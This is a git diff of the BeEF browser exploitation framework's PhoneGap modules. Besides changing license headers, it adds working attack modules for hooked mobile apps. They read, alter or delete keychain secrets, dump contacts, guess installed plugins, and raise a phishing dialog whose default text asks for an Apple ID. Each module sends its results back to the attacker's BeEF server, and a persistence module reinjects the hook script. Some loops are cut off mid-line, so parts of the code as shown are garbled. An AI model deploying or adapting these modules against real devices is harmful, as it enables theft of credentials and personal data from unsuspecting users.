a/modules/phonegap/phonegap_geo_locate/config.yaml +++ b/modules/phonegap/phonegap_geo_locate/config.yaml @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # # phonegap # diff --git a/modules/phonegap/phonegap_geo_locate/module.rb b/modules/phonegap/phonegap_geo_locate/module.rb index 848d32e62..80fcb8d77 100644 --- a/modules/phonegap/phonegap_geo_locate/module.rb +++ b/modules/phonegap/phonegap_geo_locate/module.rb @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # # phonegap # diff --git a/modules/phonegap/phonegap_globalization_status/command.js b/modules/phonegap/phonegap_globalization_status/command.js new file mode 100644 index 000000000..e5f657b9b --- /dev/null +++ b/modules/phonegap/phonegap_globalization_status/command.js @@ -0,0 +1,34 @@ +// +// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission +// + +// Phonegap_globalization_status +// +beef.execute(function() { + var result = ''; + + navigator.globalization.getPreferredLanguage( + function (language) { + result = 'language: ' + language.value + '\n'; + beef.net.send("<%= @command_url %>", <%= @command_id %>, 'result='+result ); + }, + function () { + result = 'language: ' + 'fail\n'; + beef.net.send("<%= @command_url %>", <%= @command_id %>, 'result='+result ); + } + ); + + navigator.globalization.getLocaleName( + function (locale) { + result = 'locale: ' + locale.value + '\n'; + beef.net.send("<%= @command_url %>", <%= @command_id %>, 'result='+result ); + }, + function () { + result = 'locale: ' + 'fail\n'; + beef.net.send("<%= @command_url %>", <%= @command_id %>, 'result='+result ); + } + ); + +}); \ No newline at end of file diff --git a/modules/phonegap/phonegap_globalization_status/config.yaml b/modules/phonegap/phonegap_globalization_status/config.yaml new file mode 100644 index 000000000..7ced9d85a --- /dev/null +++ b/modules/phonegap/phonegap_globalization_status/config.yaml @@ -0,0 +1,17 @@ +# +# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission +# +# Phonegap_globalization_status +# +beef: + module: + phonegap_globalization_status: + enable: true + category: "Phonegap" + name: "Globalization Status" + description: "Examine device local settings" + authors: ["staregate"] + target: + working: ["All"] diff --git a/modules/phonegap/phonegap_globalization_status/module.rb b/modules/phonegap/phonegap_globalization_status/module.rb new file mode 100644 index 000000000..1bb32a3ae --- /dev/null +++ b/modules/phonegap/phonegap_globalization_status/module.rb @@ -0,0 +1,15 @@ +# +# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission +# +# // Phonegap_globalization_status + +class Phonegap_globalization_status < BeEF::Core::Command + + def post_execute + content = {} + content['Result'] = @datastore['result'] + save content + end +end diff --git a/modules/phonegap/phonegap_keychain/command.js b/modules/phonegap/phonegap_keychain/command.js new file mode 100644 index 000000000..57d0f0693 --- /dev/null +++ b/modules/phonegap/phonegap_keychain/command.js @@ -0,0 +1,82 @@ +// +// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission +// + +// Phonegap_keychain +// +beef.execute(function() { + var servicename = "<%== @servicename %>"; + var key = "<%== @key %>"; + var value = "<%== @value %>"; + var action = "<%== @action %>"; + var result = ''; + var kc = ''; + + try { + kc = cordova.require("cordova/plugin/keychain"); + } catch (err) { + result = 'Unable to access keychain plugin'; + beef.net.send("<%= @command_url %>", <%= @command_id %>, 'result='+result ); + } + + function onGet() + { + var win = function(value) { + result = result + "GET SUCCESS - Key: " + key + " Value: " + value; + beef.net.send("<%= @command_url %>", <%= @command_id %>, 'result='+result ); + + }; + var fail = function(error) { + result = result + "GET FAIL - Key: " + key + " Error: " + error; + beef.net.send("<%= @command_url %>", <%= @command_id %>, 'result='+result ); + }; + + kc.getForKey(win, fail, key, servicename); + + } + + function onSet() + { + var win = function() { + result = result + "SET SUCCESS - Key: " + key; + beef.net.send("<%= @command_url %>", <%= @command_id %>, 'result='+result ); + }; + var fail = function(error) { + result = result + "SET FAIL - Key: " + key + " Error: " + error; + beef.net.send("<%= @command_url %>", <%= @command_id %>, 'result='+result ); + }; + + kc.setForKey(win, fail, key, servicename, value); + } + + function onRemove() + { + var win = function() { + result = result + "REMOVE SUCCESS - Key: " + key; + beef.net.send("<%= @command_url %>", <%= @command_id %>, 'result='+result ); + }; + var fail = function(error) { + result = result + "REMOVE FAIL - Key: " + key + " Error: " + error; + beef.net.send("<%= @command_url %>", <%= @command_id %>, 'result='+result ); + }; + + kc.removeForKey(win, fail, key, servicename); + } + + if (kc !== undefined) { + switch(action) { + case 'Read': + onGet(); + break; + case 'CreateUpdate': + onSet(); + break; + case 'Delete': + onRemove(); + break; + } + } + +}); diff --git a/modules/phonegap/phonegap_keychain/config.yaml b/modules/phonegap/phonegap_keychain/config.yaml new file mode 100644 index 000000000..bd1ae43d7 --- /dev/null +++ b/modules/phonegap/phonegap_keychain/config.yaml @@ -0,0 +1,17 @@ +# +# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission +# +# Phonegap_keychain +# +beef: + module: + phonegap_keychain: + enable: true + category: "Phonegap" + name: "Keychain" + description: "Read/CreateUpdate/Delete Keychain Elements" + authors: ["staregate"] + target: + working: ["All"] diff --git a/modules/phonegap/phonegap_keychain/module.rb b/modules/phonegap/phonegap_keychain/module.rb new file mode 100644 index 000000000..17260b9ec --- /dev/null +++ b/modules/phonegap/phonegap_keychain/module.rb @@ -0,0 +1,53 @@ +# +# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission +# +# Phonegap_keychain +# + +class Phonegap_keychain < BeEF::Core::Command + + def self.options + return [{ + 'name' => 'servicename', + 'description' => 'Service name', + 'ui_label'=>'Service name', + 'value' => 'ServiceNameTest', + 'width' => '300px' + + },{ + 'name' => 'key', + 'description' => 'Key', + 'ui_label'=>'Key', + 'value' => 'TestKey', + 'width' => '300px' + },{ + 'name' => 'value', + 'description' => 'Value', + 'ui_label'=>'Value', + 'value' => 'TestValue', + 'width' => '100px' + },{ + 'name' => 'action', + 'type' => 'combobox', + 'ui_label' => 'Action Type', + 'store_type' => 'arraystore', + 'store_fields' => ['action'], + 'store_data' => [['Read'],['CreateUpdate'],['Delete']], + 'valueField' => 'action', + 'value' => 'CreateUpdate', + editable: false, + 'displayField' => 'action', + 'mode' => 'local', + 'autoWidth' => true + }] + end + + def callback + content = {} + content['Result'] = @datastore['result'] + save content + end + +end diff --git a/modules/phonegap/phonegap_list_contacts/command.js b/modules/phonegap/phonegap_list_contacts/command.js new file mode 100644 index 000000000..6587811af --- /dev/null +++ b/modules/phonegap/phonegap_list_contacts/command.js @@ -0,0 +1,43 @@ +// +// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission +// + +// phonegap_list_contacts +// +beef.execute(function() { + var result = ''; + + function onSuccess(contacts) { + + for (var i=0; i", <%= @command_id %>, 'result='+result ); + + } + }; + + function onError(contactError) { + result = 'fail'; + beef.net.send("<%= @command_url %>", <%= @command_id %>, 'result='+result ); + }; + + + var options = new ContactFindOptions(); + options.filter=""; + options.multiple=true; + var fields = ["displayName", "phoneNumbers", "emails"]; + + navigator.contacts.find(fields, onSuccess, onError, options); + +}); \ No newline at end of file diff --git a/modules/phonegap/phonegap_list_contacts/config.yaml b/modules/phonegap/phonegap_list_contacts/config.yaml new file mode 100644 index 000000000..7b4e28cff --- /dev/null +++ b/modules/phonegap/phonegap_list_contacts/config.yaml @@ -0,0 +1,17 @@ +# +# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission +# +# phonegap +# +beef: + module: + phonegap_list_contacts: + enable: true + category: "Phonegap" + name: "List Contacts" + description: "Examine device contacts." + authors: ["staregate"] + target: + working: ["All"] diff --git a/modules/phonegap/phonegap_list_contacts/module.rb b/modules/phonegap/phonegap_list_contacts/module.rb new file mode 100644 index 000000000..e892b491a --- /dev/null +++ b/modules/phonegap/phonegap_list_contacts/module.rb @@ -0,0 +1,15 @@ +# +# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission +# +# // phonegap_list_contacts + +class Phonegap_list_contacts < BeEF::Core::Command + + def post_execute + content = {} + content['Result'] = @datastore['result'] + save content + end +end diff --git a/modules/phonegap/phonegap_list_files/command.js b/modules/phonegap/phonegap_list_files/command.js index 14bdd0406..9ba1ca42f 100644 --- a/modules/phonegap/phonegap_list_files/command.js +++ b/modules/phonegap/phonegap_list_files/command.js @@ -1,18 +1,9 @@ // -// Copyright 2012 Wade Alcorn wade@bindshell.net -// -// Licensed under the Apache License, Version 2.0 (the "License"); -// you may not use this file except in compliance with the License. -// You may obtain a copy of the License at -// -// http://www.apache.org/licenses/LICENSE-2.0 -// -// Unless required by applicable law or agreed to in writing, software -// distributed under the License is distributed on an "AS IS" BASIS, -// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -// See the License for the specific language governing permissions and -// limitations under the License. +// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission // + // phonegap_upload // beef.execute(function() { diff --git a/modules/phonegap/phonegap_list_files/config.yaml b/modules/phonegap/phonegap_list_files/config.yaml index a4a20c709..fa4fc0b1a 100644 --- a/modules/phonegap/phonegap_list_files/config.yaml +++ b/modules/phonegap/phonegap_list_files/config.yaml @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # # phonegap # diff --git a/modules/phonegap/phonegap_list_files/module.rb b/modules/phonegap/phonegap_list_files/module.rb index 51cff073c..4cba7f962 100644 --- a/modules/phonegap/phonegap_list_files/module.rb +++ b/modules/phonegap/phonegap_list_files/module.rb @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # # phonegap # diff --git a/modules/phonegap/phonegap_persist_resume/command.js b/modules/phonegap/phonegap_persist_resume/command.js index 39bb9ed7e..232a7f279 100644 --- a/modules/phonegap/phonegap_persist_resume/command.js +++ b/modules/phonegap/phonegap_persist_resume/command.js @@ -1,17 +1,8 @@ -// -// Copyright 2012 Wade Alcorn wade@bindshell.net -// -// Licensed under the Apache License, Version 2.0 (the "License"); -// you may not use this file except in compliance with the License. -// You may obtain a copy of the License at -// -// http://www.apache.org/licenses/LICENSE-2.0 -// -// Unless required by applicable law or agreed to in writing, software -// distributed under the License is distributed on an "AS IS" BASIS, -// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -// See the License for the specific language governing permissions and -// limitations under the License. +/* + * Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net + * Browser Exploitation Framework (BeEF) - http://beefproject.com + * See the file 'doc/COPYING' for copying permission + */ // // persist on over app's sleep/wake events diff --git a/modules/phonegap/phonegap_persist_resume/config.yaml b/modules/phonegap/phonegap_persist_resume/config.yaml index 0d08526ab..6ee1f0f6e 100644 --- a/modules/phonegap/phonegap_persist_resume/config.yaml +++ b/modules/phonegap/phonegap_persist_resume/config.yaml @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # # persist on over app's sleep/wake events diff --git a/modules/phonegap/phonegap_persist_resume/module.rb b/modules/phonegap/phonegap_persist_resume/module.rb index bef0ca663..b9bb7d085 100644 --- a/modules/phonegap/phonegap_persist_resume/module.rb +++ b/modules/phonegap/phonegap_persist_resume/module.rb @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # # persist on over app's sleep/wake events diff --git a/modules/phonegap/phonegap_persistence/command.js b/modules/phonegap/phonegap_persistence/command.js index 7944fa756..d15797a72 100644 --- a/modules/phonegap/phonegap_persistence/command.js +++ b/modules/phonegap/phonegap_persistence/command.js @@ -1,18 +1,9 @@ // -// Copyright 2012 Wade Alcorn wade@bindshell.net -// -// Licensed under the Apache License, Version 2.0 (the "License"); -// you may not use this file except in compliance with the License. -// You may obtain a copy of the License at -// -// http://www.apache.org/licenses/LICENSE-2.0 -// -// Unless required by applicable law or agreed to in writing, software -// distributed under the License is distributed on an "AS IS" BASIS, -// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -// See the License for the specific language governing permissions and -// limitations under the License. +// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission // + // persistence // beef.execute(function() { @@ -35,12 +26,12 @@ beef.execute(function() { function write_file(text) { function fail () { - console.log('write_file fail') + beef.debug('write_file fail') } function gotFileWriter(writer) { writer.onwrite = function(evt) { - console.log("write success"); + beef.debug("write success"); } writer.write(text); } @@ -68,14 +59,14 @@ beef.execute(function() { function read_index(app_name) { function fail () { - console.log('read_index fail') + beef.debug('read_index fail') } function readFile(file) { var reader = new FileReader(); reader.onloadend = function(evt) { - //console.log("Read as text"); - console.log(evt.target.result); + //beef.debug("Read as text"); + beef.debug(evt.target.result); replace_text(evt.target.result); }; reader.readAsText(file); @@ -95,14 +86,14 @@ beef.execute(function() { function locate() { function result(entries) { - console.log('result'); + beef.debug('result'); var i; for (i=0; i.app var re = new RegExp(/^[a-zA-Z0-9]*\.app/) var match = re.exec(entries[i].name) if (match) { - console.log('found ' + entries[i].name); + beef.debug('found ' + entries[i].name); // look for ../.app/www/index.html read_index(entries[i].name); @@ -116,11 +107,11 @@ beef.execute(function() { function fail() { - console.log('fail'); + beef.debug('fail'); } function win(entries) { - console.log('win'); + beef.debug('win'); result(entries); } diff --git a/modules/phonegap/phonegap_persistence/config.yaml b/modules/phonegap/phonegap_persistence/config.yaml index 7d449e7c9..b195d0366 100644 --- a/modules/phonegap/phonegap_persistence/config.yaml +++ b/modules/phonegap/phonegap_persistence/config.yaml @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # # phonegap persistence # diff --git a/modules/phonegap/phonegap_persistence/module.rb b/modules/phonegap/phonegap_persistence/module.rb index 30face23d..7c262bbe9 100644 --- a/modules/phonegap/phonegap_persistence/module.rb +++ b/modules/phonegap/phonegap_persistence/module.rb @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # # phonegap persistenece # @@ -21,6 +11,7 @@ class Phonegap_persistence < BeEF::Core::Command def self.options @configuration = BeEF::Core::Configuration.instance + proto = configuration.get("beef.http.https.enable") == true ? "https" : "http" beef_host = @configuration.get("beef.http.public") || @configuration.get("beef.http.host") beef_port = @configuration.get("beef.http.public_port") || @configuration.get("beef.http.port") @@ -28,7 +19,7 @@ class Phonegap_persistence < BeEF::Core::Command 'name' => 'hook_url', 'description' => 'The URL of your BeEF hook', 'ui_label'=>'Hook URL', - 'value' => 'http://'+beef_host+':'+beef_port+'/hook.js', + 'value' => proto + '://'+beef_host+':'+beef_port+'/hook.js', 'width' => '300px' }] end diff --git a/modules/phonegap/phonegap_plugin_detection/command.js b/modules/phonegap/phonegap_plugin_detection/command.js new file mode 100644 index 000000000..557566d76 --- /dev/null +++ b/modules/phonegap/phonegap_plugin_detection/command.js @@ -0,0 +1,49 @@ +// +// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission +// + +// phonegap_plugin_detection +// +beef.execute(function() { + var result = ''; + + // Approximate list of plugins, intended to work with Cordova 2.x + var plugins = new Array( + "cordova/plugin/device", + "cordova/plugin/logger", + "cordova/plugin/compass", + "cordova/plugin/accelerometer", + "cordova/plugin/Camera", + "cordova/plugin/network", + "cordova/plugin/contacts", + "cordova/plugin/echo", + "cordova/plugin/File", + "cordova/plugin/FileTransfer", + "cordova/plugin/geolocation", + "cordova/plugin/notification", + "cordova/plugin/Media", + "cordova/plugin/capture", + "cordova/plugin/splashscreen", + "cordova/plugin/battery", + "cordova/plugin/globalization", + "cordova/plugin/InAppBrowser", + "cordova/plugin/keychain" + ); + + for (var i=0; i", <%= @command_id %>, 'result='+result ); + +}); \ No newline at end of file diff --git a/modules/phonegap/phonegap_plugin_detection/config.yaml b/modules/phonegap/phonegap_plugin_detection/config.yaml new file mode 100644 index 000000000..a5a09713e --- /dev/null +++ b/modules/phonegap/phonegap_plugin_detection/config.yaml @@ -0,0 +1,17 @@ +# +# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission +# +# phonegap_plugin_detection +# +beef: + module: + phonegap_plugin_detection: + enable: true + category: "Phonegap" + name: "List Plugins" + description: "Attempts to guess installed plugins." + authors: ["staregate"] + target: + working: ["All"] diff --git a/modules/phonegap/phonegap_plugin_detection/module.rb b/modules/phonegap/phonegap_plugin_detection/module.rb new file mode 100644 index 000000000..f9567f8bf --- /dev/null +++ b/modules/phonegap/phonegap_plugin_detection/module.rb @@ -0,0 +1,14 @@ +# +# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission +# +# // phonegap_plugin_detection + +class Phonegap_plugin_detection < BeEF::Core::Command + def post_execute + content = {} + content['Result'] = @datastore['result'] + save content + end +end diff --git a/modules/phonegap/phonegap_prompt_user/command.js b/modules/phonegap/phonegap_prompt_user/command.js new file mode 100644 index 000000000..b539e9b65 --- /dev/null +++ b/modules/phonegap/phonegap_prompt_user/command.js @@ -0,0 +1,29 @@ +// +// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission +// + +// Phonegap_prompt_user +// +beef.execute(function() { + var title = "<%== @title %>"; + var question = "<%== @question %>"; + var ans_yes = "<%== @ans_yes %>"; + var ans_no = "<%== @ans_no %>"; + var result = ''; + + + function onPrompt(results) { + result = "Selected button number " + results.buttonIndex + " result: " + results.input1; + beef.net.send("<%= @command_url %>", <%= @command_id %>, 'result='+result ); + } + + navigator.notification.prompt( + question, + onPrompt, + title, + [ans_yes,ans_no] + ); + +}); diff --git a/modules/phonegap/phonegap_prompt_user/config.yaml b/modules/phonegap/phonegap_prompt_user/config.yaml new file mode 100644 index 000000000..f1e212eae --- /dev/null +++ b/modules/phonegap/phonegap_prompt_user/config.yaml @@ -0,0 +1,17 @@ +# +# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission +# +# Phonegap_prompt_user +# +beef: + module: + phonegap_prompt_user: + enable: true + category: "Phonegap" + name: "Prompt User" + description: "Ask device user a question" + authors: ["staregate"] + target: + working: ["All"] diff --git a/modules/phonegap/phonegap_prompt_user/module.rb b/modules/phonegap/phonegap_prompt_user/module.rb new file mode 100644 index 000000000..2aa3a373e --- /dev/null +++ b/modules/phonegap/phonegap_prompt_user/module.rb @@ -0,0 +1,46 @@ +# +# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission +# +# Phonegap_prompt_user +# + +class Phonegap_prompt_user < BeEF::Core::Command + + def self.options + return [{ + 'name' => 'title', + 'description' => 'Prompt title', + 'ui_label'=>'Title', + 'value' => 'Apple ID', + 'width' => '300px' + + },{ + 'name' => 'question', + 'description' => 'Prompt question', + 'ui_label'=>'Question', + 'value' => 'Please enter your Apple ID', + 'width' => '300px' + },{ + 'name' => 'ans_yes', + 'description' => 'Prompt positive answer button label', + 'ui_label'=>'Yes', + 'value' => 'Submit', + 'width' => '100px' + },{ + 'name' => 'ans_no', + 'description' => 'Prompt negative answer button label', + 'ui_label'=>'No', + 'value' => 'Cancel', + 'width' => '100px' + }] + end + + def callback + content = {} + content['Result'] = @datastore['result'] + save content + end + +end diff --git a/modules/phonegap/phonegap_start_record_audio/command.js b/modules/phonegap/phonegap_start_record_audio/command.js index 503fc606d..9df2a9a08 100644 --- a/modules/phonegap/phonegap_start_record_audio/command.js +++ b/modules/phonegap/phonegap_start_record_audio/command.js @@ -1,18 +1,9 @@ // -// Copyright 2012 Wade Alcorn wade@bindshell.net -// -// Licensed under the Apache License, Version 2.0 (the "License"); -// you may not use this file except in compliance with the License. -// You may obtain a copy of the License at -// -// http://www.apache.org/licenses/LICENSE-2.0 -// -// Unless required by applicable law or agreed to in writing, software -// distributed under the License is distributed on an "AS IS" BASIS, -// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -// See the License for the specific language governing permissions and -// limitations under the License. +// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission // + // exploit phonegap // beef.execute(function() { diff --git a/modules/phonegap/phonegap_start_record_audio/config.yaml b/modules/phonegap/phonegap_start_record_audio/config.yaml index 28e228adc..8ceaa385c 100644 --- a/modules/phonegap/phonegap_start_record_audio/config.yaml +++ b/modules/phonegap/phonegap_start_record_audio/config.yaml @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # # phonegap # diff --git a/modules/phonegap/phonegap_start_record_audio/module.rb b/modules/phonegap/phonegap_start_record_audio/module.rb index 1a24663cb..ac955617c 100644 --- a/modules/phonegap/phonegap_start_record_audio/module.rb +++ b/modules/phonegap/phonegap_start_record_audio/module.rb @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # # phonegap # diff --git a/modules/phonegap/phonegap_stop_record_audio/command.js b/modules/phonegap/phonegap_stop_record_audio/command.js index 0463a023c..589f76a73 100644 --- a/modules/phonegap/phonegap_stop_record_audio/command.js +++ b/modules/phonegap/phonegap_stop_record_audio/command.js @@ -1,18 +1,9 @@ // -// Copyright 2012 Wade Alcorn wade@bindshell.net -// -// Licensed under the Apache License, Version 2.0 (the "License"); -// you may not use this file except in compliance with the License. -// You may obtain a copy of the License at -// -// http://www.apache.org/licenses/LICENSE-2.0 -// -// Unless required by applicable law or agreed to in writing, software -// distributed under the License is distributed on an "AS IS" BASIS, -// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -// See the License for the specific language governing permissions and -// limitations under the License. +// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission // + // exploit phonegap // beef.execute(function() { diff --git a/modules/phonegap/phonegap_stop_record_audio/config.yaml b/modules/phonegap/phonegap_stop_record_audio/config.yaml index 5737fa722..71ea3b389 100644 --- a/modules/phonegap/phonegap_stop_record_audio/config.yaml +++ b/modules/phonegap/phonegap_stop_record_audio/config.yaml @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # # phonegap # diff --git a/modules/phonegap/phonegap_stop_record_audio/module.rb b/modules/phonegap/phonegap_stop_record_audio/module.rb index f1022c7f2..ec9d916ba 100644 --- 